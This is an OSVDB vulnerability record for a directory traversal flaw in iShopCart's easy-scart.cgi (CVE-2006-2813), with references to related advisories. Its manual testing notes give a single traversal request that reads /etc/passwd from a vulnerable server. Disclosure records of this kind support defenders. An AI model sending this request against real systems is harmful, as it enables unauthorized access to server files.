iShopCart easy-scart.cgi Traversal Arbitrary File Access

2006-05-31T07:05:23
ID OSVDB:25968
Type osvdb
Reporter OSVDB
Modified 2006-05-31T07:05:23

Description

Manual Testing Notes

/cgi-bin/easy-scart.cgi?../../../../../../../etc/passwd

References:

Vendor URL: http://www.ishopcart.com/ Secunia Advisory ID:20415 Related OSVDB ID: 25970 Related OSVDB ID: 25969 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0704.html FrSIRT Advisory: ADV-2006-2108 CVE-2006-2813 Bugtraq ID: 18223